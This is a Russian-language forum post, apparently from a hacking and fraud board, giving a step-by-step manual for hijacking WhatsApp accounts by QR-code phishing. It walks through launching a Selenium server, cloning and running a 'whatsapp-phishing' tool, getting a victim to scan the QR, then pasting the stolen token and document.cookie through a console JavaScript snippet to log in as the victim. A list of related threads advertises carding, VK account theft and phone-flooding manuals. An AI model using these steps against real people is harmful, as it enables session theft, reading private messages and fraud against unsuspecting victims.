Мануал: Атакуем WhatsApp

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

В этой теме пойдет речь о взломе мессенджера WhatsApp.

Для начала, немного истории, не так давно (вроде бы, весной 2016) компания объявила, о том, что вся переписка и личные данные защищены методом «Сквозного шифрования», вот как о нем говорит сама компания:

Сквозное шифрование доступно, в случае если вы и ваши собеседники используете последние версии WhatsApp. Сквозное шифрование гарантирует, что только вы и человек, с которым вы общаетесь, можете прочитать содержимое, и никто кроме Вас. Все сообщения защищены уникальным замком. Только у адресата и у вас есть специальный ключ, который необходим, чтобы разблокировать и прочитать сообщения. Для дополнительной защиты каждое сообщение, которое вы отправляете, имеет уникальный замок и ключ. Все это происходит автоматически: вам не нужно настраивать параметры или создавать специальные секретные чаты, чтобы обеспечить защиту сообщений. Отключить сквозное шифрование невозможно.

Даже администрация мессенджера не в силах расшифровать Ваши данные. Это, безусловно, шикарная новость для пользователей. Но, как известно, безопасность - это иллюзия. Далее будет описан взлом с использованием фишинга.



Начнем.
Во-первых, необходимо скачать Selenium, jar файл отсюда

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Selenium Server – это сервер, который позволяет управлять браузером с удалённой машины, по сети. На той машине, где должен работать браузер, устанавливается и запускается сервер. Затем на другой машине запускается программа, которая, используя специальный драйвер RemoteWebDriver, соединяется с сервером и отправляет ему команды. Затем запускает браузер и выполняет в нём эти команды, используя драйвер, соответствующий этому браузеру.



Затем перейдем в папку, куда он был скачан:

> cd Загрузки/
37636880f7bdfb63f5cbe.png

> chmod a+x (позволим файлу исполнение)​
> ./selenium-server-standalone-3.0.0-beta4.jar (стартуем сервер)​
91349f616439c0f92103d.png

Не исключаю, что для корректной работы сервера потребуется geckodriver, его можно взять отсюда:

3cb8d5bab161b476f1409.png

Теперь необходимо получить утилиту whatsapp-phishing, откроем новое окно терминала и напишем:

> git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

Затем перейдем в папку с whatsapp-phishing:

> cd whatsapp-phishing
И внимательно выполняем следующие команды:

> npm install
npm(Node.js Package Manager) — менеджер пакетов, входящий в состав Node.js.

Эта команда позволит установить все необходимое, Node.js и Socket.io, которые требуются для запуска веб-сайта и сервера Selenium. Если в процессе вы столкнулись с выводами команды - "Missing", то можно установить все вручную по порядку:

> npm install node.js
> npm install socket.io
> npm install wd
После того, как все необходимое было установлено, вводим в терминале следующую команду:

> nodejs index.js
В случае если вы все сделали правильно, увидите такой вывод:

943337d090da9430d2dad.png

Теперь, перейдя по ссылке в браузере – localhost:8080, видим это:

53fa739529b68105422c1.png

Выделенный QR необходимо доставить целевому устройству. Затем оно должно просканировать его своим приложением WhatsApp. Когда все сделано, WhatsApp аутентифицирует браузер, который управляется Selenserver и позволит получать token и document.cookie от целевой системы.

Итак, после того, QR был просканирован, можно скопировать token и document.cookie.



Перейдем в терминал, где запущен whatsapp-phishing и скопируем оттуда следующие строки:

1181e632cf09971759c63.png

Предлагаю запустить новую вкладку браузера в режиме «приват». В ней перейдем на сайт web.whatsapp.com.

Затем, на этой вкладке откроем режим разработчика:

fb8bf705068837c1916f8.png

Пишем в строке:

> var t= (затем копируем сюда код из консоли whatsapp-phishing)​
83e823834c2a57bcd9169.png

3127235c9eacd727b51f1.png

Необходимо очень внимательно это делать, так как синтаксис будет ругаться на скопированные пробелы и т.д.



Затем пишем руками код следующего содержания:

> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}
Жмем enter, и последняя команда:

> login (t)
Теперь перезагрузим вкладку браузера, результатом будет доступ к аккаунту устройства, которое просканировало наш QR в начале.

b6028b76d47e9f1b963aa.png
 
Похожие темы
wrangler65 Мануал по Google Ads Полезные статьи 0
Denik Интересно Мануал по работе с Amazon Обучения, схемы, мануалы 22
igori9891 Сливаю свой мануал) Раздачи и сливы 0
Denik Интересно Мануал по вбиву сс Обучения, схемы, мануалы 5
M Раздам Мануал по Ставкам Раздачи и сливы 25
F Мануал✍ черная схема ۞ зароботка на Авито Юле ☠ Тема Лютая ☢ Обучения, схемы, мануалы 1
B 6 Лендингов Adalt/Dating & (Мануал по арбитражу) Раздачи и сливы 0
Allen Мануал по самостоятельной добыче CC+VBV Полезные статьи 0
АнАлЬнАя ЧуПаКаБрА Мануал по рефу электроники Раздачи и сливы 4
1 Dedicated Servers - мануал для чайников (Брут дедиков) Уязвимости и взлом 0
V Свежайший мануал по вбиву в Amazon Полезные статьи 11
G [Слив]Софт для грамотного развода на продаже прогнозов по ставкам + мануал как разводить Готовый софт 4
R Крупнейший мануал по безопасности в сети за 1000 лет Анонимность и приватность 1
G Приватный мануал по звонкам с любых номеров. Полезные статьи 5
K Мануал: Скрытое управление компьютером на Windows (используя Metasploit) #2 Уязвимости и взлом 0
K Мануал: Скрытое управление компьютером на Windows (используя Metasploit) #1 Уязвимости и взлом 3
M Мануал по безопасности за 10к Раздачи и сливы 3
G Мануал: подмена ссылки Вконтакте Полезные статьи 0
G Мануал: Способ халявного интернет трафика Полезные статьи 2
G Мануал по взлому страничек VK Фишинг, мошенничество, СИ 4
max7000 Полный мануал по кардингу и безопасности в сети Полезные статьи 7
S Мануал: Пробив информации по номеру телефона Полезные статьи 4
S Мануал: Способ добычи инсталлов Раздачи и сливы 0
I Мануал по взлому ВК и набиву инсталлов by InsBaron. [ОФ. СЛИВ] Фишинг, мошенничество, СИ 24
D Слив схемы зароботка с дарквеба за 8к / Мануал по взлому ВК и Инсталлам. Взлом на заказ. Фишинг, мошенничество, СИ 5
V Полный мануал по безопасности в сети Анонимность и приватность 6
V Мануал по взлому ВК (эксклюзив) Полезные статьи 2
АнАлЬнАя ЧуПаКаБрА Мануал по работе с аккаунтами OZON Раздачи и сливы 1
M Мануал по работе с платежными системами. Анонимный ввод / вывод Полезные статьи 7
I Мануал по pyrit (утилита для взлома WiFi) Полезные статьи 1
M Мануал по пакету программ "aircrack-ng" Полезные статьи 0
G Шоплифтинг: информативный мануал. Полезные статьи 8
Danzila Мануал SQL. Полезные статьи 0
Little_Prince Мануал KorbenDallas Cyberfox-JAP Анонимность и приватность 0
АнАлЬнАя ЧуПаКаБрА Мануал по длинным поездка Яндекс.Такси [До 5000р] Полезные статьи 1
obscure Мануал по добыче аккаунтов VK (слито) Фишинг, мошенничество, СИ 92
АнАлЬнАя ЧуПаКаБрА Мануал по отвязке iCloud Раздачи и сливы 3
D ДДос на телефоны жертвы.Слитый мануал. Готовый софт 1
D Мануал по флуду + софт Раздачи и сливы 4
opnot Мануал по взлому хешей Полезные статьи 0
Admin Нашелся где то в закромах харда мануал по хардкорной настройке тора. Взял в паблике. Анонимность и приватность 3
Support81 SMS не приходят — добавьте почту. WhatsApp предлагает россиянам «резервный ключ» Новости в сети 0
wrangler65 RemoteWA Охота на пользователей Whatsapp Анонимность и приватность 0
Support81 Telegram, WhatsApp и другие — теперь в зоне прослушки? В России хотят мониторить мессенджеры в реальном времени Новости в сети 0
Support81 Сдал WhatsApp за 1500? Будь готов к сроку по 159-й Новости в сети 0
Support81 Звонок за миллион: мошенники превратили WhatsApp в оружие массового обмана Новости в сети 0
Support81 Цукерберг: спецслужбы США могут читать любой WhatsApp-чат Новости в сети 0
Support81 После Viber: в Госдуме допускают блокировку WhatsApp Новости в сети 0
DOMINUS Проверено Блокировка (BAN) соц.сетей, мессенджеров [INSTAGRAM, WhatsApp, FaceBook (FB), и многих других], моб. номеров и банк. карт Ищу работу. Предлагаю свои услуги. 1
Support81 Шпионаж на $31 млн: WhatsApp раскрыл тайны глобальной слежки Израиля Новости в сети 0

Название темы